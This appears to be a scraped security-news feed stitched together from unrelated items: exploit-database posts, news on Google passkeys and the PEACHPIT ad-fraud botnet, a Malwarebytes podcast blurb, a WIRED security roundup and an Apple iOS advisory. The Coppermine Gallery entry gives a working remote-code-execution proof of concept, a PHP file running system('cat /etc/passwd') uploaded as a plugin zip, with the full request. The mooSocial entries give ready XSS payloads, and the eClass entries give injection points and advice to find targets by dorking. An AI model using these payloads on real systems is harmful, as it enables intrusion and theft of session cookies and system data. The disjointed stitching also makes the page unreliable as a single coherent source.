Coppermine Gallery version 1.6.25 remote code execution exploit.

    Exploit Title: coppermine-gallery 1.6.25 RCEApplication: coppermine-galleryVersion: v1.6.25  Bugs:  RCETechnology: PHPVendor URL: https://coppermine-gallery.net/Software Link: https://github.com/coppermine-gallery/cpg1.6.x/archive/refs/tags/v1.6.25.zipDate of found: 05.09.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps1.First of All create php file content as <?php echo system('cat /etc/passwd'); ?> and sequeze this file with zip.$ cat >> test.php <?php echo system('cat /etc/passwd'); ?>$ zip test.zip test.php1. Login to account2. Go to http://localhost/cpg1.6.x-1.6.25/pluginmgr.php3. Upload zip file4. Visit to php file   http://localhost/cpg1.6.x-1.6.25/plugins/test.phppoc requestPOST /cpg1.6.x-1.6.25/pluginmgr.php?op=upload HTTP/1.1Host: localhostContent-Length: 630Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryi1AopwPnBYPdzorFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/cpg1.6.x-1.6.25/pluginmgr.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: cpg16x_data=YTo0OntzOjI6IklEIjtzOjMyOiI0MmE1Njk2NzhhOWE3YTU3ZTI2ZDgwYThlYjZkODQ4ZCI7czoyOiJhbSI7aToxO3M6NDoibGFuZyI7czo3OiJlbmdsaXNoIjtzOjM6ImxpdiI7YTowOnt9fQ%3D%3D; cpg16x_fav=YToxOntpOjA7aToxO30%3D; d4e0836e1827aa38008bc6feddf97eb4=93ffa260bd94973848c10e15e50b342cConnection: close------WebKitFormBoundaryi1AopwPnBYPdzorFContent-Disposition: form-data; name="plugin"; filename="test.zip"Content-Type: application/zipPK�����™b%Wz½µ}(���(�����test.phpUT  �ñòödÓòödux���������<?php echo system('cat /etc/passwd');?>PK�����™b%Wz½µ}(���(������������¤����test.phpUT�ñòödux���������PK������N���j�����------WebKitFormBoundaryi1AopwPnBYPdzorFContent-Disposition: form-data; name="form_token"50982f2e64a7bfa63dbd912a7fdb4e1e------WebKitFormBoundaryi1AopwPnBYPdzorFContent-Disposition: form-data; name="timestamp"1693905214------WebKitFormBoundaryi1AopwPnBYPdzorF--

Coppermine Gallery 1.6.25 Remote Code Execution

Google is making passkeys, the emerging passwordless login technology, the default option for users as it moves to make passwords “obsolete.”

Less than six months ago, Google announced that it was launching support for the password replacement known as “passkeys” for all personal accounts across its billions of users. Today, the company said it is going a step further and will make passkeys the default login setting for users.

When you log in to your Google account, you’ll get a prompt to create a passkey and start using it for login instead of relying on your Gmail address and password. Google will be turning on the “skip password when possible” option in account settings, which is essentially the passkey green light. Users who don't want to kill their password just yet will still be able to turn that setting off so they don't receive the prompts.

Password-based authentication is so ubiquitous in digital systems that it isn't easy to replace. But passwords have inherent security problems because they can be guessed and stolen. And since it's so difficult to keep track of dozens or hundreds of passwords, users often reuse the same passwords on multiple accounts, making it easier for attackers to unlock all of those accounts in one fell swoop. Passkeys are specifically designed to address these issues and dramatically reduce the risk of phishing attacks by instead relying on a scheme that manages cryptographic keys stored on your devices for account authentication.

Google didn't share statistics on passkey adoption so far, saying instead in a blog post that “people have used passkeys on their favorite apps like YouTube, Search and Maps, and we’re encouraged by the results.” The company points out that passkey support is expanding across other apps and services. Apple and Microsoft both support passkeys. And companies like Uber and eBay recently launched passkeys, and they're coming to WhatsApp soon.

“Passwordless is something we set out to achieve 10-plus years ago, and we’re thrilled to not only see us already on the next step of the journey with passkeys by offering them by default, but also to see the great feedback from users who have made the switch,” Christiaan Brand, identity and security group product manager at Google, tells WIRED.

There's so much inertia on passwords around the world that even a player as big and influential as Google can't force the issue overnight. But the company is clearly using its influence to steer users with gentle pressure that seems likely to continue mounting as passkeys gain broader momentum.

“We’ll keep you updated on where else you can start using passkeys across other online accounts,” the company wrote today. “In the meantime, we’ll continue encouraging the industry to make the pivot to passkeys—making passwords a rarity, and eventually obsolete.”

Google Makes Passkeys Default, Stepping Up Its Push to Kill Passwords

Cross Site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code via a crafted payload to the admin_redirect_url parameter of the user login function.

A reflected cross-site scripting (XSS) vulnerability in the **admin\_redirect\_url** parameter on user login function of mooSocial v3.1.8 which allows attackers to steal admin's session cookies and impersonate their account via a crafted URL.

    Payload : "><script>alert(1)</script> 
    FINAL Payload (URL encoded) : test%22%3e%3cscript%3ealert(1)%3c%2fscript%3etest
    

    GET /moosocial/admin/home/login?admin_redirect_url=aHR0cDovL2xvY2FsaG9zdC9tb29zb2NpYWwvYWRtaW4vcGx1Z2lucw%22%3e%3cscript%3ealert(1)%3c%2fscript%3etest HTTP/1.1
    Host: localhost
    Accept-Encoding: gzip, deflate, br
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Cookie: CAKEPHP=nidqufo1vqbqircuufs0mh98m4; 19edc47bb57545288d88183ca75c9a0bmooSocial[theme]=Q2FrZQ%3D%3D.7AxYtZYvgA%3D%3D
    Upgrade-Insecure-Requests: 1
    Referer: http://745f1976-76bd-42e5-9ece-01e2ad60316d.com/
    Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="117", "Chromium";v="117"
    Sec-CH-UA-Platform: Windows
    Sec-CH-UA-Mobile: ?0

CVE-2023-44812: GitHub - ahrixia/CVE-2023-44812: mooSocial v3.1.8 is vulnerable to cross-site scripting on Admin redirect function.

Cross Site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code via a crafted payload to the mode parameter of the invite friend login function.

A reflected cross-site scripting (XSS) vulnerability in the **mode** parameter on Invite Friend function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.

    Payload : ');alert(1)//
    FINAL Payload (URL encoded) : %27)%3balert(1)%2f%2f
    

    GET /moosocial/friends/ajax_invite?mode=model%27)%3balert(1)%2f%2f;' HTTP/1.1
    Host: localhost
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Cookie: 19edc47bb57545288d88183ca75c9a0bmooSocial[activity_feed]=Q2FrZQ%3D%3D.7R9bpposmi8%3D
    Connection: close

CVE-2023-44813: GitHub - ahrixia/CVE-2023-44813: mooSocial v3.1.8 is vulnerable to cross-site scripting on Invite Friend function.

An ad fraud botnet dubbed PEACHPIT leveraged an army of hundreds of thousands of Android and iOS devices to generate illicit profits for the threat actors behind the scheme.
The botnet is part of a larger China-based operation codenamed BADBOX, which also entails selling off-brand mobile and connected TV (CTV) devices on popular online retailers and resale sites that are backdoored with an

An ad fraud botnet dubbed **PEACHPIT** leveraged an army of hundreds of thousands of Android and iOS devices to generate illicit profits for the threat actors behind the scheme.

The botnet is part of a larger China-based operation codenamed BADBOX, which also entails selling off-brand mobile and connected TV (CTV) devices on popular online retailers and resale sites that are backdoored with an Android malware strain called Triada.

"The PEACHPIT botnet's conglomerate of associated apps were found in 227 countries and territories, with an estimated peak of 121,000 devices a day on Android and 159,000 devices a day on iOS," HUMAN said.

The infections are said to have been realized through a collection of 39 apps that were installed more than 15 million times. Devices fitted with the malware allowed the operators to steal sensitive data, create residential proxy exit peers, and commit ad fraud through the bogus apps.

It's currently not clear how the Android devices are compromised with a firmware backdoor, but evidence points to a hardware supply chain attack.

"Threat actors can also use the backdoored devices to create WhatsApp messaging accounts by stealing one-time passwords from the devices," the company said.

"Additionally, threat actors can use the devices to create Gmail accounts, evading typical bot detection because the account looks like it was created from a normal tablet or smartphone, by a real person."

Details about the criminal enterprise were first documented by Trend Micro in May 2023, attributing it to an adversary it tracks as Lemon Group.

HUMAN said that it identified at least 200 distinct Android device types, including mobile phones, tablets, and CTV products, that have exhibited signs of BADBOX infection, suggesting a widespread operation.

A notable aspect of the ad fraud is the use of counterfeit apps on Android and iOS made available on major app marketplaces such as the Apple App Store and Google Play Store as well as those that are automatically downloaded to backdoored BADBOX devices.

Present within the Android apps is a module responsible for creating hidden WebViews that are then used to request, render, and click on ads, and masquerading the ad requests as originating from legitimate apps, a technique previously observed in the case of VASTFLUX.

The fraud prevention firm noted that it worked with Apple and Google to disrupt the operation, adding "the remainder of BADBOX should be considered dormant: the C2 servers powering the BADBOX firmware backdoor infection have been taken down by the threat actors."

What's more, an update pushed out earlier this year has been found to remove the modules powering PEACHPIT on BADBOX-infected devices in response to mitigation measures deployed in November 2022.

That having said, it's suspected the attackers are adjusting their tactics in a likely attempt to circumvent the defenses.

"What makes matters worse is the level of obfuscation the operators went through to go undetected, a sign of their increased sophistication," HUMAN said. "Anyone can accidentally buy a BADBOX device online without ever knowing it was fake, plugging it in, and unknowingly opening this backdoor malware."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

PEACHPIT: Massive Ad Fraud Botnet Powered by Millions of Hacked Android and iOS

eClass Junior version 4.0 suffers from a remote SQL injection vulnerability.

**eClass Junior 4.0 SQL Injection**

Posted Oct 9, 2023

Authored by indoushka

eClass Junior version 4.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection

SHA-256 | fe25bf20628b95e728482b08a8d3f9ce6bd4e732844de33554a5951468322a2a

Download | Favorite | View

**eClass Junior 4.0 SQL Injection**

    ====================================================================================================================================| # Title     : eClass Junior 4.0 Sql injection Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.eclass.com.hk/en/product/eclass-junior/                                                                |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /gallery_detail.php?cid=55 <===== inject here[+] http://127.0.0.www.cls.eduhk/tc/gallery_detail.php?cid=55[+] Panel : /templates/index.php?err=1&DirectLink= or /ad_min_man/login.phpGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,456)
*   Arbitrary (16,316)
*   BBS (2,859)
*   Bypass (1,764)
*   CGI (1,029)
*   Code Execution (7,343)
*   Conference (680)
*   Cracker (843)
*   CSRF (3,352)
*   DoS (23,623)
*   Encryption (2,372)
*   Exploit (52,159)
*   File Inclusion (4,230)
*   File Upload (977)
*   Firewall (821)
*   Info Disclosure (2,797)
*   Intrusion Detection (895)
*   Java (3,054)
*   JavaScript (865)
*   Kernel (6,760)
*   Local (14,525)
*   Magazine (586)
*   Overflow (12,775)
*   Perl (1,423)
*   PHP (5,156)
*   Proof of Concept (2,345)
*   Protocol (3,623)
*   Python (1,543)
*   Remote (30,920)
*   Root (3,598)
*   Rootkit (513)
*   Ruby (612)
*   Scanner (1,644)
*   Security Tool (7,912)
*   Shell (3,201)
*   Shellcode (1,216)
*   Sniffer (896)
*   Spoof (2,213)
*   SQL Injection (16,422)
*   TCP (2,417)
*   Trojan (687)
*   UDP (896)
*   Virus (666)
*   Vulnerability (31,915)
*   Web (9,732)
*   Whitepaper (3,753)
*   x86 (965)
*   XSS (18,011)
*   Other

**File Archives**

*   October 2023
*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,026)
*   BSD (375)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,858)
*   Fedora (1,692)
*   FreeBSD (1,246)
*   Gentoo (4,347)
*   HPUX (879)
*   iOS (358)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (46,943)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (486)
*   RedHat (13,974)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,974)
*   UNIX (9,323)
*   UnixWare (186)
*   Windows (6,591)
*   Other

eClass Junior 4.0 SQL Injection

eClass IP version 2.5 suffers from a remote SQL injection vulnerability.

**eClass IP 2.5 SQL Injection**

Posted Oct 9, 2023

Authored by indoushka

eClass IP version 2.5 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection

SHA-256 | b711babfc66671ea5103fe26d521747c60621f2c26be69bc9fb4ef7463b6da31

Download | Favorite | View

**eClass IP 2.5 SQL Injection**

    ====================================================================================================================================| # Title     : eClass IP 2.5 Sql injection Vulnerability                                                                          || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.eclass.com.hk/en/product/eclass-ip/                                                                    |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /gallery_detail.php?cid=55&id=161 <===== inject here[+] http://127.0.0.www.cls.eduhk/tc/gallery_detail.php?cid=55&id=161[+] Panel : /templates/index.php?err=1&DirectLink= or /ad_min_man/login.phpGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,456)
*   Arbitrary (16,316)
*   BBS (2,859)
*   Bypass (1,764)
*   CGI (1,029)
*   Code Execution (7,343)
*   Conference (680)
*   Cracker (843)
*   CSRF (3,352)
*   DoS (23,623)
*   Encryption (2,372)
*   Exploit (52,159)
*   File Inclusion (4,230)
*   File Upload (977)
*   Firewall (821)
*   Info Disclosure (2,797)
*   Intrusion Detection (895)
*   Java (3,054)
*   JavaScript (865)
*   Kernel (6,760)
*   Local (14,525)
*   Magazine (586)
*   Overflow (12,775)
*   Perl (1,423)
*   PHP (5,156)
*   Proof of Concept (2,345)
*   Protocol (3,623)
*   Python (1,543)
*   Remote (30,920)
*   Root (3,598)
*   Rootkit (513)
*   Ruby (612)
*   Scanner (1,644)
*   Security Tool (7,912)
*   Shell (3,201)
*   Shellcode (1,216)
*   Sniffer (896)
*   Spoof (2,213)
*   SQL Injection (16,422)
*   TCP (2,417)
*   Trojan (687)
*   UDP (896)
*   Virus (666)
*   Vulnerability (31,915)
*   Web (9,732)
*   Whitepaper (3,753)
*   x86 (965)
*   XSS (18,011)
*   Other

**File Archives**

*   October 2023
*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,026)
*   BSD (375)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,858)
*   Fedora (1,692)
*   FreeBSD (1,246)
*   Gentoo (4,347)
*   HPUX (879)
*   iOS (358)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (46,943)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (486)
*   RedHat (13,974)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,974)
*   UNIX (9,323)
*   UnixWare (186)
*   Windows (6,591)
*   Other

eClass IP 2.5 SQL Injection

Categories: Podcast
This week on the Lock and Code podcast, we speak with Bay Area teenager Nitya Sharma—for the second year in a row—about what she's most worried about online and what she does to stay safe. 



(Read more...)




The post AI sneak attacks, location spying, and definitely not malware, or, what one teenager fears online: Lock and Code S04E21 appeared first on Malwarebytes Labs.

Posted: October 9, 2023 by

_This week on the Lock and Code podcast..._

What are you most worried about online? And what are you doing to stay safe? 

Depending on who you are, those could be very different answers, but for teenagers and members of Generation Z, the internet isn't so scary because of traditional threats like malware and viruses. Instead, the internet is scary because of what it can expose. To Gen Z, a feared internet is one that is vindictive and cruel—an internet that reveals private information that Gen Z fears could harm their relationships with family and friends, damage their reputations, and even lead to their being bullied and physically harmed. 

Those are some of the findings from Malwarebytes' latest research into the cybersecurity and online privacy beliefs and behaviors of people across the United States and Canada this year.

Titled "Everyone's afraid of the internet and no one's sure what to do about it," Malwarebytes' new report shows that 81 percent of Gen Z worries about having personal, private information exposed—like their sexual orientations, personal struggles, medical history, and relationship issues (compared to 75 percent of non-Gen Zers). And 61 percent of Gen Zers worry about having embarrassing or compromising photos or videos shared online (compared to 55% of non Gen Zers). Not only that, 36 percent worry about being bullied because of that info being exposed, while 34 percent worry about being physically harmed. For those outside of Gen Z, those numbers are a lot lower—only 22 percent worry about bullying, and 27 percent worry about being physically harmed.

Does this mean Gen Z is uniquely careful to prevent just that type of information from being exposed online? Not exactly. They talk more frequently to strangers online, they more frequently share personal information on social media, and they share photos and videos on public forums more than anyone—all things that leave a trail of information that could be gathered against them.

Today, on the Lock and Code podcast with host David Ruiz, we drill down into what, specifically, a Bay Area teenager is afraid of when using the internet, and what she does to stay safe. Visiting the Lock and Code podcast for the second year in the row is Nitya Sharma, discussing AI "sneak attacks," political disinformation campaigns, the unannounced location tracking of Snapchat, and why she simply cannot be bothered about malware. 

> "I know that there's a threat of sharing information with bad people and then abusing it, but I just don't know what you would do with it. Show up to my house and try to kill me?" 

Tune in today to listen to the full conversation.

To read the full report, click below. 

Read the report

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

**RELATED ARTICLES**

AI sneak attacks, location spying, and definitely not malware, or, what one teenager fears online: Lock and Code S04E21

Plus: Sony confirms a breach of its networks, US federal agents get caught illegally using phone location data, and more.

Does the public have a right to see gruesome photos of animal test subjects taken by a public university?

That question underpins an ongoing court battle between UC Davis and the Physicians Committee for Responsible Medicine, an animal welfare group, which is fighting for the release of photos of dead monkeys used in tests of Elon Musk–owned Neuralink’s brain-chip implants. A WIRED investigation this week revealed the extent to which Neuralink and UC Davis have gone to keep images of the tests secret.

Also this week, an investigation by the Markup, copublished with WIRED, analyzed crime predictions by Geolitica (formerly PredPol) in Plainfield, New Jersey, and found that they accurately predicted crime less than 1 percent of the time. As WIRED previously reported, Geolitica is shutting down at the end of this year and being sold for parts to SoundThinking, maker of the gunshot-detection system ShotSpotter.

Earlier this year, the data-extortion gang Clop exploited a vulnerability in the widely used file-transfer service MOVEit, racking up victims around the globe including major corporations and US government agencies. The full number of victim organizations continues to climb into the thousands, with more than 3.4 million people’s data potentially stolen, making it the biggest hack of 2023.

If you own an inexpensive Android TV streaming box, you may want to toss it into the sea—or recycle it responsibly. New research found that at least eight cheap streaming boxes contained a backdoor that connects the devices with servers in China and is used to commit fraud and other cybercrime. Researchers also found dozens of Android, iOS, and TV box apps that were used for fraudulent behavior. While at least some of the apps have been removed from the app stores, more than 120,000 Android devices and 150,000 iOS devices were impacted.

Speaking of phone security, we detailed how to know when your device will stop getting security updates and how to keep Google from using your data in its generative AI tool, Bard. Finally, we profiled the team at a UK-based nonprofit that’s helping women fight back against digital domestic violence.

That’s not all. Each week we round up the security and privacy news that we didn’t cover in depth ourselves. Click the headlines to read the full stories. And stay safe out there.

When WIRED first reported that Apple had sent a letter responding to demands from an anti-child-exploitation group called Heat Initiative, we had one big question: What the hell is Heat Initiative? An investigation by the Intercept now provides some clues.

According to the Intercept, the group is funded by “dark-money donors” linked to billionaire Democrats. Sarah Gardner, who leads the group, refused to comment on Heat Initiative’s funding and said she disagrees with Apple’s “privacy-absolutist” approach. The group, which had virtually no online presence when Apple sent that letter, is now waging a high-profile campaign to force the company to do more to scan for child sexual abuse material (CSAM) on users’ devices and iCloud storage, which would likely mean weakening encryption.

After Apple scrapped plans to scan images on users’ devices for CSAM amid widespread backlash, the company focused instead on tools known as Community Safety features for reporting CSAM. It also rolled out encrypted iCloud options. The company says it cannot meet Heat Initiative demands without compromising user privacy and security.

Sony Interactive Entertainment confirmed this week that it is the latest victim of the aforementioned MOVEit breach. The company says it has informed some 6,800 people, including past and current employees, about the breach, which may have exposed Social Security numbers and personal information. Data-extortion gang Clop has claimed responsibility for the breach, which Sony says it detected on June 2. Sony says it is working with cybersecurity experts and law enforcement as part of its investigation into the intrusion.

Agents working for the US Customs and Border Protection, Immigration and Customs Enforcement, and the US Secret Service broke the law by purchasing commercially available phone location data, according to a new report from the US Department of Homeland Security’s inspector general. Privacy and civil liberty advocates have long argued that the purchase of such data, known in the US government as commercial telemetry data (CTD), circumvents Fourth Amendment protections against unreasonable searches and seizures because agents don’t need to obtain a warrant to buy the information. But the inspector general report says the data was illegally accessed because agents failed to conduct a mandated privacy impact assessment before buying CTD.

The US Department of Justice this week unsealed indictments against eight Chinese firms and 12 of their employees, accusing them of producing and distributing chemicals needed for the production of fentanyl, a deadly opioid, in the United States. The employees and companies were also sanctioned by the US Treasury Department, cutting them off from US financial institutions. According to the DOJ, the companies “tend to use cryptocurrency transactions to conceal their identities and the location and movement of their funds.”

“We have identified and blocked over a dozen virtual currency wallets associated with these actors,” Treasury deputy secretary Wally Adeyemo said during a press conference on October 3. “The blocked wallets, which received millions of USD funds over hundreds of deposits, illustrate the scope and scale of the operation targeted today.”

Apple's Encryption Is Under Attack by a Mysterious Group

Apple Security Advisory 2023-10-04-1 - iOS 17.0.3 and iPadOS 17.0.3 addresses buffer overflow and code execution vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2023-10-04-1 iOS 17.0.3 and iPadOS 17.0.3iOS 17.0.3 and iPadOS 17.0.3 addresses the following issues.Information about the security content is also available athttps://support.apple.com/kb/HT213961.Apple maintains a Security Updates page athttps://support.apple.com/HT201222 which lists recentsoftware updates with security advisories.KernelAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: A local attacker may be able to elevate their privileges. Appleis aware of a report that this issue may have been actively exploitedagainst versions of iOS before iOS 16.6.Description: The issue was addressed with improved checks.CVE-2023-42824WebRTCAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: A buffer overflow may result in arbitrary code executionDescription: The issue was addressed by updating to libvpx 1.13.1.WebKit Bugzilla: 262365CVE-2023-5217This update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/  iTunes and Software Update on thedevice will automatically check Apple's update server on its weeklyschedule. When an update is detected, it is downloaded and the optionto be installed is presented to the user when the iOS device isdocked. We recommend applying the update immediately if possible.Selecting Don't Install will present the option the next time youconnect your iOS device.  The automatic update process may take up toa week depending on the day that iTunes or the device checks forupdates. You may manually obtain the update via the Check for Updatesbutton within iTunes, or the Software Update on your device.  Tocheck that the iPhone, iPod touch, or iPad has been updated:  *Navigate to Settings * Select General * Select About. The versionafter applying this update will be "iOS 17.0.3 and iPadOS 17.0.3".All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmUd15wACgkQX+5d1TXaIvqEoQ/+PIrFp2opkANUwD7d+pcGVnkS4fK7lGqqG6FMpuGuRhf8E+lf/SVAMzcKbXfFLhb+Fs/Z+81RKwy3xmC/kHis9K/SWaMFsTW0ctfeU83hSMIQ+JI0wvfnJy/c8thYA6u151HqJdAZKruyphTz4OEq2eUJqvPXGxiHNWyjfCacpmLnUt24WbVTL4CaGqX3tRsJLCH4XEJ/hYXNBZUolwdz4vFUG1P9OsjzOaTSIt0sVg/LZK5MTu7tcvEEBKXu9Rsfkq1KgXy6E3xo5/nkyZiMBvOLoWIPNq2BYA5Hw2V2wow6mPEpqaMPTsuFEMRJ0wqJfQwBtuRtdRt+mNJRE62+4lTfuDGEgvYlasGCqw2t180eiXQHtjoGBEwgXJ0rsjADZtTGnmEir2r/P+bRajtQRAmsVf1zhSpSksHib/3CFlin3dsLqB48lPCYy4K72u6vGrISKehm7bT3i5cxMD9ktcDEUd3TP4BjSHruttRb95UnQmQHlr6X68JAL2iT20POFpa6U8PBlgRTOKOL251lB3Ri+Q/TIO0KtTj6d6SIWAxdOyPtaHM458l3oUeexzEd7U8afA4LdITYwlETsFau/HTdky/CJjnVAaigtvnOBbrK8AIGPG2lOLwm2KiNvElbQ2M/JokxOahO/+f/PYWKOIzyVYnQA8xfP2cVSg9fqAA=eLl5-----END PGP SIGNATURE-----

Tag

#apple